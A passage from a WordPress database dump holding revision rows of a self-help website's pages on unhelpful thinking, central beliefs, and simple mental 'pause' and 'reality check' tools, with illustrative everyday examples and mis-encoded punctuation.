us now imagine that Sujith''s mind has the opposite central belief, â€œI have poor leadership skillsâ€. In this scenario, if he was offered the same job, his mind might have the supporting thought, â€œYou have useless leadership skills and you will therefore fail in this new jobâ€, prompting him to refuse the job offer. The supporting thoughts blindly support one''s central beliefs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As central beliefs direct almost all aspects of oneâ€™s life, itâ€™s very important that one has central beliefs that truly represent oneself. You may now wonder how one can have central beliefs that do not truly represent oneself. Unfortunately, this can happen quite easily and I will explain how. As mentioned before, central beliefs often start to form in oneâ€™s childhood, which is a time when oneâ€™s mind is not fully developed and is quite immature. This can lead to one having central beliefs that may not be truly logical. For example, imagine that a small child, who we will call Gaby, is with her mother, who is quite preoccupied with some pressing issue. As they walk in the park, imagine that Gabyâ€™s mother buys her an ice cream. Unfortunately, a few minutes later, imagine that Gaby accidentally drops the ice cream, and her mother, in a lapse of concentration, says, â€œYou are stupidâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Gaby, who does not have the mental maturity of an adult, may take this statement coming from her mother seriously and this may lead to the formation of the untrue central belief, â€œI am stupidâ€ in her mind.&nbsp; Now you might say, â€œSurely, when Gaby grows up, she would replace this with a more realistic core belief, such as â€œI am not stupid.â€ Unfortunately, things are not all that logical when it comes to the mind! What can happen is that some childhood central beliefs can remain unchanged in oneâ€™s mind and persist into adulthood. Itâ€™s almost as if oneâ€™s mind forgets that the central beliefs are from one''s childhood, and instead just â€œassumesâ€ that such beliefs must be true.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Such unchallenged untrue central beliefs that persist into adulthood can cause harm. In the case of Gaby, her childhood untrue central belief, â€œI am stupidâ€, may remain unchallenged with new logical thinking as she grows up and this could limit her potential as an adult. For example, this unchallenged untrue central belief may well dissuade Gaby from pursuing a university education. This would be a pity, because if she disregarded her untrue central belief, she may well have flourished in university.Â </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Such unchallenged untrue central beliefs may remain quietly in the background, and get activated at only certain times. For example, continuing with the ice cream example, the adult Gaby may not always be thinking â€œI am stupid.â€ But say, when Gaby thinks about applying for a university education, the â€œI am stupidâ€ untrue central belief may surface at that moment, and dissuade her from continuing.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Untrue central beliefs can sometimes be difficult to discover as they may lie in the background. However, you will recall that untrue central beliefs are associated with â€œsupporting thoughtsâ€. If one cannot work out oneâ€™s untrue central beliefs, one may be able to recognise the supporting thoughts instead. For example, when thinking about her higher education, Gaby may not recognise the untrue central belief â€œI am stupidâ€, but instead, she may recognise the supporting thought, â€œI should not apply to university, as I will surely fail if I enrolled in one.â€ Such supporting thoughts that support untrue central core beliefs can unnecessarily negatively affect oneâ€™s life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you can imagine, unchallenged untrue central beliefs can unnecessarily limit a person''s potential. One goal of happy thinking is of course to deal with such beliefs. However, we will keep that for later on the website, when we discuss various psychological tools that you can use to access and change untrue central beliefs. For now, just remember the basic concept of central beliefs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/all-or-nothing-thinking/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/psychological-tools/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Untrue central beliefs', '', 'inherit', 'closed', 'closed', '', '1632-revision-v1', '', '', '2023-08-09 18:25:26', '2023-08-09 18:25:26', '', 1632, 'https://www.happythinking.com/?p=2065', 0, 'revision', '', 0),
(2063, 1, '2023-08-09 18:19:26', '2023-08-09 18:19:26', '<!-- wp:paragraph -->\n<p>I am sure that you have a desire to be happy. After all, that is probably why you are visiting this website with the name â€œHappy Thinkingâ€! Unfortunately, as you know, the world you and I live in is full of stress and problems, which at times can make it challenging to find happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":2038,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/unhappycloudsface_21_7_2023.jpg" alt="" class="wp-image-2038"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>However, while you may not be able to always control the things happening around you, one thing you can control is how your mind â€œthinksâ€. The â€œway you thinkâ€ can determine if the problems you face make you remain happy or become unhappy. The ultimate goal of happy thinking is to help you to think in ways that allow you to be happy despite the problems around you.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1782,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/yellowunhappy_100623.jpg" alt="" class="wp-image-1782"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>To better understand how â€œthe way one thinksâ€ can affect oneâ€™s happiness, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":2039,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/two_unhappy_faces_21_7_2023.jpg" alt="" class="wp-image-2039"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>However, when facing this stressful situation, letâ€™s imagine that the two people think differently to each other.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of them might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were positive as they did not make the personâ€™s sadness worse. Rather, this personâ€™s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job. This type of thinking helps the person be as happy as possible given the circumstances, and is what I would call, â€œhelpful thinkingâ€.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was unhelpful as it made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult. This type of thinking just made the person feel worse and less able to solve his problems, and is what I call, â€unhelpful thinkingâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Despite facing the same stress, one personâ€™s way of thinking made him or her remain happy while the other personâ€™s way of thinking made that person unhappy. Two different outcomes, just by thinking differently.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":2040,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/one_unhappy_faces_21_7_2023.jpg" alt="" class="wp-image-2040"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Over your life, you may have developed unhelpful ways of thinking that can unnecessarily cause you to have an unhappy mental state. Such â€œunhelpful thinkingâ€ can create problems when none exists or if there are real problems, may make them negatively affect you more than they should (like in the example we just described). You may have developed the habit of thinking in such unhelpful ways so gradually that you may not even realise that you are thinking in such ways. Happy thinking is about changing unhelpful thinking, and the first step is to be able to recognise when such thinking occurs in yourself. If you are not able to recognise unhelpful thinking, how can you change it? Therefore, to help you to recognise when unhelpful thinking happens to you, in this website I will describe, in an easy-to-understand way, common types of unhelpful thinking that people do.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Of course, once you recognise unhelpful thinking, you will want to change such thinking. To help you with this, I will describe various mental tools that you can use to change unhelpful thinking. Just like a repairman will use various tools to repair something, you will be able to use these tools to change your unhelpful thinking. These â€œtoolsâ€ are very practical and you will be able to use them in your daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In addition to helping you to recognise and change unhelpful thinking, I will also share with you bits of wisdom about happiness that I have collected from various places. Wisdom can help one to see the world with a different and happier viewpoint. All these ingredients together make Happy Thinking, which will help you to achieve happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the next pages (i.e. first part of this website), I will explain to you in an easy-to-understand way, common types of unhelpful thinking that people do. As you learn about the common types of unhelpful thinking, see which ones apply to you and feel free to skim over the ones that seem to be not relevant to you.Â </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1883,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/patternrecognition170623a.gif" alt="" class="wp-image-1883"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Please note that in the first section of this website, I will not mention any of the mental tools that you can use to deal with unhelpful thinking. Those I will share with you after you understand the various types of unhelpful thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Finally do not try to understand and remember every type of unhelpful thinking in one go. A lot of people think that by speed reading and clicking through pages, they would miraculously end up becoming happier. Unfortunately, by going too fast, the information will just bounce off oneâ€™s mind, rather than interacting with it.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":2041,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/shape_bounce_21_7_23.jpg" alt="" class="wp-image-2041"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Like lots of things, you need to go slow so that you can appreciate and digest knowledge. This website will always be there for you, so take as long as you like to read it. You are always welcome to keep visiting here.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Letâ€™s move on to understand common types of unhelpful thinking. Letâ€™s see how many will be relevant to you! In my case, I could recognise many of them in my own mind.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negativity-effect/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-08-09 18:19:26', '2023-08-09 18:19:26', '', 1034, 'https://www.happythinking.com/?p=2063', 0, 'revision', '', 0),
(2068, 1, '2023-08-09 18:31:01', '2023-08-09 18:31:01', '<!-- wp:paragraph -->\n<p>Our minds are full of thoughts that whizz past in all directions in our heads. Some of these thoughts may be helpful for our well-being, but others may be unhelpful. Happy thinking is about applying tools to deal with the latter. However, it would be very difficult to meaningfully interact with such â€œspeedingâ€ thoughts. To engage with a thought, one needs to first â€œpauseâ€ it so that it can â€œhearâ€ one speaking to it. It''s a bit like when a child is crazily running around in a room, to speak to the child meaningfully, one will first need the child to cease running and become still. In the case of the child, one may shout her name loudly, â€œShelly!â€,&nbsp; and this would, at least briefly, make her pause her running around. Once one gets her attention, one may be able to engage with her, â€œShelly, itâ€™s time for dinner!â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So how can one get the attention of a thought that is speeding along? The answer is to use oneâ€™s inner voice. As soon as one senses an unhelpful thinking pattern occurring in oneâ€™s mind, one can use oneâ€™s internal voice to say as strongly as possible, â€œPause!â€ What this does is to temporarily â€œfreezeâ€ the thought, so that oneâ€™s mind can engage with it before it continues to cause more unhelpful thoughts to be generated.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let me explain this concept using an example that we used before when discussing the unhelpful thinking pattern, â€œcatastrophic thinkingâ€. In that example, a person called Susan has a teenage daughter who is fifteen minutes late returning home from school. Susan, with her catastrophic thinking, is straight away thinking of only the worst possible outcome, â€œOh no, my daughter must have met with a road traffic accident and may be bleeding to death at this very moment.â€ At this point, this thought is unhelpful because there is no information to say that an accident has actually happened, and there are so many other less serious options such as the school bus being stuck in traffic. Susanâ€™s mind is simply â€œassumingâ€ that an accident has happened, without having any evidence to suggest that assumption.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Susanâ€™s incorrect assumption is making her unnecessarily worry. However, she is aware that she suffers from anxiety and she has some suspicions that her thoughts are probably unhelpful. So her first step is to pause the thought, and she does this by using her internal voice and saying to her mind, â€œPauseâ€. This briefly pauses her unhelpful thought, â€œShe must have met with a horrendous road traffic accident.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Now if this was all that had to be done for unhelpful thinking patterns, i.e. just saying â€œpauseâ€, wouldnâ€™t that be great? A few â€œpausesâ€ and everything would be fine! As you have probably guessed, there are a few more steps needed. That is, once an unhelpful thinking pattern has been paused, one will need to use a few other simple tools to deal with the thought, and I will explain those tools in subsequent sections of this website. The concept of the pause tool is to simply pause a thought for a few seconds, giving just enough time for other tools to be used on the thought. If one did not do anything after pausing a thought, the thought would soon â€œunpauseâ€ and continue being unhelpful to the person.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Some of you may think, â€œWhy not use the word â€˜stopâ€™ instead of the word â€˜pauseâ€™, as the former is a much more commanding word?â€ The reason is, perhaps like humans, thoughts do not â€˜likeâ€™ to follow orders! Let me demonstrate this using a simple psychological experiment that we can do right now. Are you ready? Ok. I am going to give you a super easy task now. For this task, you do not even have to move a finger! Here is your task: â€œPlease DO NOT think of a white rabbit.â€ I am sure you will agree that it is quite an easy task, where all I have asked you to do is not think of a white rabbit. However, I am quite sure that most of you would have failed this simple task and would have thought, at least briefly and vaguely, of a white rabbit! This is a very common finding and highlights how telling your thoughts to go away (e.g. by saying stopâ€) does not work, and even can have the opposite effect. That is why I named this tool the â€œpause toolâ€ rather than naming it the â€œstop toolâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The pause tool may appear simplistic, but once you combine it with the other tools that I will explain to you later, you will realise that it is actually quite powerful. The aim of the pause tool is to simply hold an unhelpful thought just long enough for other tools to engage with it. Donâ€™t underestimate the power of your inner voice!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/inner-voice/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/reality-check/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Pause tool', '', 'inherit', 'closed', 'closed', '', '1650-revision-v1', '', '', '2023-08-09 18:31:01', '2023-08-09 18:31:01', '', 1650, 'https://www.happythinking.com/?p=2068', 0, 'revision', '', 0),
(2069, 1, '2023-08-09 18:31:41', '2023-08-09 18:31:41', '<!-- wp:paragraph -->\n<p>As you know by now, the main aim of happy thinking is to help one deal with unhelpful thinking patterns. A common feature of unhelpful thinking patterns is that often they are unhelpful because they distort reality. That is, such thoughts are based more on what one â€œimaginesâ€ the truth to be rather than what the truth actually is.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For a moment, letâ€™s assume that you are a judge in a court of law and that there is a person in front of you who has been accused of stealing a cake (I suppose it''s not the most serious of crimes, but this is only an example!). Now as a good and professional judge, it would be crazy for you to tell the accused, â€œHey, I â€˜imagineâ€™ that you must have stolen that cake, and therefore I declare that you are guilty.â€ There would be an uproar in the court because one needs to judge someone based on evidence rather than mere imagination.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Unfortunately, oneâ€™s mind can often rely on imagination rather than facts, and this can cause one to have a lot of unnecessary distress. People often make the mistake of assuming that their thoughts accurately represent reality, when actually, they often may not. This is where a tool which I call the â€œreality check toolâ€, can be very useful. With this tool, after using the pause tool to â€œpauseâ€ the unhelpful thought, one asks oneâ€™s mind, â€œHow much of this thought is based on real evidence and how much of this thought is based on imagination.â€ To understand the reality check tool, let us continue with our example from the previous section, where Sueâ€™s daughter was only fifteen minutes late returning home from school and she was having the unhelpful thought, â€œShe must have met with a terrible road traffic accidentâ€.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So how could Sue use the reality check tool in this situation? As mentioned before, Susan''s first step would be to use the â€œpause toolâ€ where she would use her internal voice to say â€œpauseâ€ to herself.&nbsp; She then applies the reality check tool to the paused thought, and asks herself, â€œWhat actual evidence do I have that supports my thought that my daughter has had a terrible road traffic accident?â€. As Susan would look for evidence, she would soon realise that she actually does not have any evidence that her daughter has met with a road traffic accident. I.e. there are no phone calls or messages, no news reports, etc at this point to indicate that something awful has happened. Rather, she would realise that she has â€œimaginedâ€ a thought with the worst outcome rather than having an evidence-based thought. With this realisation, Susanâ€™s unhelpful thoughts would fade away.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This is not to say that Susanâ€™s thought was utterly unrealistic as after all road traffic accidents do happen. Rather, the issue is that Susanâ€™s imagination was assuming the worst before there was actual evidence to support that view. The imagined unhelpful thought would have caused her to have unnecessary worry and possibly even panic, before being at all certain that such worry was warranted. In fact, to highlight this, letâ€™s make our example have a happy ending. Soon after Susan uses the reality check tool, her daughter walks through the door five minutes later, saying, â€œGosh there was so much traffic on the roads today our school bus got held up!â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When using the reality check tool, one must take care to only look for genuine evidence that could justify the unhelpful thought and avoid the temptation to â€œimagineâ€ evidence (i.e. fake evidence!). This can happen if oneâ€™s mind is desperate to prove that the unhelpful thought is true. When using the reality check tool, it would of course be useless to compare imaginary evidence Vs imagination!&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So in summary, the reality check tool is about asking, â€œHow much of this thought is based on real evidence and how much of this thought is based on imagination.â€ One will find that with unhelpful thoughts, there will be little or no evidence to support it. Once one realises that, the unhelpful thought should fade away.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/pause/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/ignore-move-on/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Reality check tool', '', 'inherit', 'closed', 'closed', '', '1655-revision-v1', '', '', '2023-08-09 18:31:41', '2023-08-09 18:31:41', '', 1655, 'https://www.happythinking.com/?p=2069', 0, 'revision', '', 0),
(2070, 1, '2023-08-09 18:33:00', '2023-08-09 18:33:00', '<!-- wp:paragraph -->\n<p>As you know by now, the main aim of happy thinking is to help one deal with unhelpful thinking patterns. A common feature of unhelpful thinking patterns is that often they are unhelpful because they distort reality. That is, such thoughts are based more on what one â€œimaginesâ€ the truth to be rather than what the truth actually is.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For a moment, letâ€™s assume that you are a judge in a court of law and that there is a person in front of you who has been accused of stealing a cake (I suppose it''s not the most serious of crimes, but this is only an example!). Now as a good and professional judge, it would be crazy for you to tell the accused, â€œHey, I â€˜imagineâ€™ that you must have stolen that cake, and therefore I declare that you are guilty.â€ There would be an uproar in the court because one needs to judge someone based on evidence rather than mere imagination.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Unfortunately, oneâ€™s mind can often rely on imagination rather than facts, and this can cause one to have a lot of unnecessary distress. People often make the mistake of assuming that their thoughts accurately represent reality, when actually, they often may not. This is where a tool which I call the â€œreality check toolâ€, can be very useful. With this tool, after using the pause tool to â€œpauseâ€ the unhelpful thought, one asks oneâ€™s mind, â€œHow much of this thought is based on real evidence and how much of this thought is based on imagination.â€ To understand the reality check tool, let us continue with our example from the previous section, where Sueâ€™s daughter was only fifteen minutes late returning home from school and she was having the unhelpful thought, â€œShe must have met with a terrible road traffic accidentâ€.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So how could Sue use the reality check tool in this situation? As mentioned before, Susan''s first step would be to use the â€œpause toolâ€ where she would use her internal voice to say â€œpauseâ€ to herself.&nbsp; She then applies the reality check tool to the paused thought, and asks herself, â€œWhat actual evidence do I have that supports my thought that my daughter has had a terrible road traffic accident?â€. As Susan would look for evidence, she would soon realise that she actually does not have any evidence that her daughter has met with a road traffic accident. I.e. there are no phone calls or messages, no news reports, etc at this point to indicate that something awful has happened. Rather, she would realise that she has â€œimaginedâ€ a thought with the worst outcome rather than having an evidence-based thought. With this realisation, Susanâ€™s unhelpful thoughts would fade away.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This is not to say that Susanâ€™s thought was utterly unrealistic as after all road traffic accidents do happen. Rather, the issue is that Susanâ€™s imagination was assuming the worst before there was actual evidence to support that view. The imagined unhelpful thought would have caused her to have unnecessary worry and possibly even panic, before being at all certain that such worry was warranted. In fact, to highlight this, letâ€™s make our example have a happy ending. Soon after Susan uses the reality check tool, her daughter walks through the door five minutes later, saying, â€œGosh there was so much traffic on the roads today our school bus got held up!â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When using the reality check tool, one must take care to only look for genuine evidence that could justify the unhelpful thought and avoid the temptation to â€œimagineâ€ evidence (i.e. fake evidence!). This can happen if oneâ€™s mind is desperate to prove that the unhelpful thought is true. When using the reality check tool, it would of course be useless to compare imaginary evidence Vs imagination!&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So in summary, the reality check tool is about asking, â€œHow much of this thought is based on real evidence and how much of this thought is based on imagination.â€ One will find that with unhelpful thoughts, there will be little or no evidence to support it. Once one realises that, the unhelpful thought should fade away.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/pause/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/other-possibilities/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Reality check tool', '', 'inherit', 'closed', 'closed', '', '1655-revision-v1', '', '', '2023-08-09 18:33:00', '2023-08-09 18:33:00', '', 1655, 'https://www.happythinking.com/?p=2070', 0, 'revision', '', 0),
(2071, 1, '2023-08-09 18:34:05', '2023-08-09 18:34:05', '<!-- wp:paragraph -->\n<p>As you know, negative thinking patterns are about seeing things in a way that does not represent reality. The â€œreality checkâ€ tool that we discussed before works by one not finding evidence to back up negative thoughts. Here, I will describe another approach you can take, which is by using what I call the â€œother possibilitiesâ€ tool. This would be best understood with the use of an example.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us imagine that Sally and her good friend Rupa are working in an office. One day, as Sally and Rupa see each other for the first time in the morning, Rupa doesnâ€™t smile and even appears to ignore Sally. Sally immediately jumps to the conclusion, â€œRupa must be angry with me.â€ For the rest of the morning, Sally is in a distressed state, trying to work out why Rupa must be angry with her. This goes on till lunchtime when Sally sees Rupa again. This time, Rupa smiles broadly and says, â€œThis morning was so stressful. My boss had wanted me to do some calculations for him, and I had worked on it all weekend on my laptop. Yet this morning, the document with all the calculations seemed to have gone missing from my laptop and I was so terrified about going to the meeting. Luckily, at the meeting, there was this guy who is really good with computers and he somehow located the missing document, and whew, everything was fine after that!â€&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you can see, in this example, Sally had unnecessarily suffered a whole morning because of the negative thought, â€œRupa must be angry with 